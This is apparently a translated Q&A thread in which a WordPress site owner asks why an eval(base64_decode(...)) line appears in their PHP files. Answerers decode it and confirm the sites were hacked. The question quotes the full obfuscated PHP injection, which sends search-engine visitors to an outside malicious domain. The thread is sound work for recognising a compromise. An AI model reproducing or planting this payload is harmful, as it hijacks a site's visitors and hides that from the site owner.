爲什麼我在wordpress PHP文件中看到eval base64_decode？

我試圖編輯我的一些WordPress的PHP文件。所有我從我的服務器下載的文件（所有WordPress網站）是這樣寫爲什麼我在wordpress PHP文件中看到eval base64_decode？

eval(base64_decode("CmVycm9yX3JlcG9ydGluZygwKTsKJHFhenBsbT1oZWFkZXJzX3NlbnQoKTsKaWYgKCEkcWF6cGxtKXsKJHJlZmVyZXI9JF9TRVJWRVJbJ0hUVFBfUkVGRVJFUiddOwokdWFnPSRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXTsKaWYgKCR1YWcpIHsKaWYgKCFzdHJpc3RyKCR1YWcsIk1TSUUgNy4wIikgYW5kICFzdHJpc3RyKCR1YWcsIk1TSUUgNi4wIikgYW5kICFzdHJzdHIoJHVhZywiRmlyZWZveC8zLiIpKXsKaWYgKHN0cmlzdHIoJHJlZmVyZXIsInlhaG9vLiIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpbmcuIikgb3Igc3RyaXN0cigkcmVmZXJlciwicmFtYmxlci4iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ3ZWJhbHRhLiIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInQuY28vIikgb3Igc3RyaXN0cigkcmVmZXJlciwidGlueXVybC5jb20iKSBvciBwcmVnX21hdGNoKCIveWFuZGV4XC5ydVwveWFuZHNlYXJjaFw/KC4qPylcJmxyXD0vIiwkcmVmZXJlcikgb3IgcHJlZ19tYXRjaCAoIi9nb29nbGVcLiguKj8pXC91cmxcP3NhLyIsJHJlZmVyZXIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImZhY2Vib29rLmNvbS9sIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYW9sLmNvbSIpIG9yIChwcmVnX21hdGNoICgiL2h0dHBzOlwvXC93d3cuZ29vZ2xlXC4oLio/KVwvLyIsJHJlZmVyZXIpIGFuZCBzdHJzdHIoJHVhZywiQ2hyb21lLyIpKSkgewppZiAoIXN0cmlzdHIoJHJlZmVyZXIsImNhY2hlIikgYW5kICFzdHJpc3RyKCRyZWZlcmVyLCJpbnVybCIpIGFuZCAhc3RyaXN0cigkcmVmZXJlciwiRWVZcDNENyIpKXsKaGVhZGVyKCJMb2NhdGlvbjogaHR0cDovL29wd25na2EuZGRucy5pbmZvLyIpOwpleGl0KCk7Cn0KfQp9Cn0KfQ=="));

都是我的網站被黑？他們在我的瀏覽器中看起來都一樣。

來源

2013-10-28 Alex

只需使用http://www.opinionatedgeek.com/dotnet/tools/base64decode/並複製粘貼該字符串，如果你想知道它是什麼 – elune

那麼它解碼爲什麼，檢查你是否是谷歌或必應和以'header（「Location：http://opwngka.ddns.info/」）結尾;'所以...是的，你已經被PHP'd了。 –

是的！您的服務器被黑屏

eval執行任何代碼作爲參數傳遞，這是base64編碼，因此您無法理解代碼在幹什麼，除非您手動解碼。

我在我的服務器上遇到了同樣的問題。我的2個WordPress網站的內容與您發佈的內容類似。我解碼了文本，它是一個從我的服務器讀取文件的腳本（類似於FTP），讀取我的數據庫（類似於PHPMyAdmin），並在我的服務器上執行命令。我運行了防病毒掃描並刪除了它們（幾百個存儲在緩存文件夾中的構造不好的主題）。您可以手動刪除這些文件。

來源

2013-10-28 04:12:14 CrewMiami

我剛剛解碼了內容並閱讀了代碼。這是它在做什麼：對於訪問這個網站的任何網站，檢查它是谷歌，雅虎，bing等（搜索引擎），並將它們重定向到http://opwngka.ddns.info/，否則不要做任何事情。 – CrewMiami

爲什麼我在wordpress PHP文件中看到eval base64_decode？

回答

相關問題